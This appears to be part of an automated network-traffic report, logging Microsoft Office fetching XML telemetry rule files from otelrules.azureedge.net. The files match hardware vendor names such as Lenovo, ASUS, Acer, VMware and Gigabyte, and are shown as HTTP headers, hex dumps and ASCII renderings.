                                            2024-11-18 20:16:37 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            36192.168.2.44978513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:37 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:37 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:37 GMT
                                            Content-Type: text/xml
                                            Content-Length: 467
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                            ETag: "0x8DC582BA6C038BC"
                                            x-ms-request-id: e210d223-001e-0049-40d2-375bd5000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201637Z-16547b76f7ftnm6xhC1DFW9c8c00000005sg000000010hx9
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:37 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            37192.168.2.44978713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:38 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:38 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:38 GMT
                                            Content-Type: text/xml
                                            Content-Length: 407
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                            ETag: "0x8DC582BBAD04B7B"
                                            x-ms-request-id: 7251505b-c01e-008d-4c79-372eec000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201638Z-164f84587bfdt5l2hC1DFW88gs00000004qg000000002q06
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:38 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            38192.168.2.44978813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:38 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:38 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:38 GMT
                                            Content-Type: text/xml
                                            Content-Length: 427
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                            ETag: "0x8DC582BA310DA18"
                                            x-ms-request-id: 7749a706-f01e-005d-3209-3713ba000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201638Z-1866b5c5fbbwlv6nhC1DFWw4bs00000004qg00000000ks9d
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:38 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            39192.168.2.44978613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:38 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:38 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:38 GMT
                                            Content-Type: text/xml
                                            Content-Length: 486
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                            ETag: "0x8DC582BB344914B"
                                            x-ms-request-id: a09399d2-801e-0015-5284-37f97f000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201638Z-164f84587bflm48hhC1DFW0nf800000002zg00000000rf07
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:38 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            40192.168.2.44978913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:38 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:38 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:38 GMT
                                            Content-Type: text/xml
                                            Content-Length: 486
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                            ETag: "0x8DC582B9018290B"
                                            x-ms-request-id: 7d8b8a82-001e-0066-1ad2-37561e000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201638Z-16547b76f7fwm7vghC1DFW900s00000003tg00000000v42m
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:38 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            41192.168.2.44979013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:38 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:38 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:38 GMT
                                            Content-Type: text/xml
                                            Content-Length: 407
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                            ETag: "0x8DC582B9698189B"
                                            x-ms-request-id: 4cebb1d6-301e-0099-6509-376683000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201638Z-16547b76f7f2b5qzhC1DFWeag400000004cg00000000y1hy
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:38 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            42192.168.2.44979113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:39 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:39 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:39 GMT
                                            Content-Type: text/xml
                                            Content-Length: 469
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                            ETag: "0x8DC582BBA701121"
                                            x-ms-request-id: fd17b6df-e01e-0033-4eef-394695000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201639Z-16547b76f7fkf5v9hC1DFW2y5s000000066g00000000a17v
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:39 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            43192.168.2.44979313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:39 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:39 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:39 GMT
                                            Content-Type: text/xml
                                            Content-Length: 477
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                            ETag: "0x8DC582BB8CEAC16"
                                            x-ms-request-id: b838fa63-a01e-001e-2d9b-3849ef000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201639Z-1866b5c5fbbg9tvxhC1DFWy9mg000000024g00000000c492
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:39 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            44192.168.2.44979213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:39 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:39 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:39 GMT
                                            Content-Type: text/xml
                                            Content-Length: 415
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                            ETag: "0x8DC582BA41997E3"
                                            x-ms-request-id: 74312329-c01e-000b-6add-39e255000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201639Z-1866b5c5fbbfhwqqhC1DFWc9sw00000000qg00000000fn81
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:39 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            45192.168.2.44979413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:39 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:39 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:39 GMT
                                            Content-Type: text/xml
                                            Content-Length: 464
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                            ETag: "0x8DC582B97FB6C3C"
                                            x-ms-request-id: e43e0d6e-f01e-0099-649d-379171000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201639Z-16547b76f7fwm7vghC1DFW900s00000003wg00000000d8cn
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:39 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            46192.168.2.44979513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:39 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:39 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:39 GMT
                                            Content-Type: text/xml
                                            Content-Length: 494
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                            ETag: "0x8DC582BB7010D66"
                                            x-ms-request-id: 5ed283f4-c01e-0082-577f-38af72000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201639Z-1866b5c5fbbfrdddhC1DFW7e9000000002cg0000000056pn
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
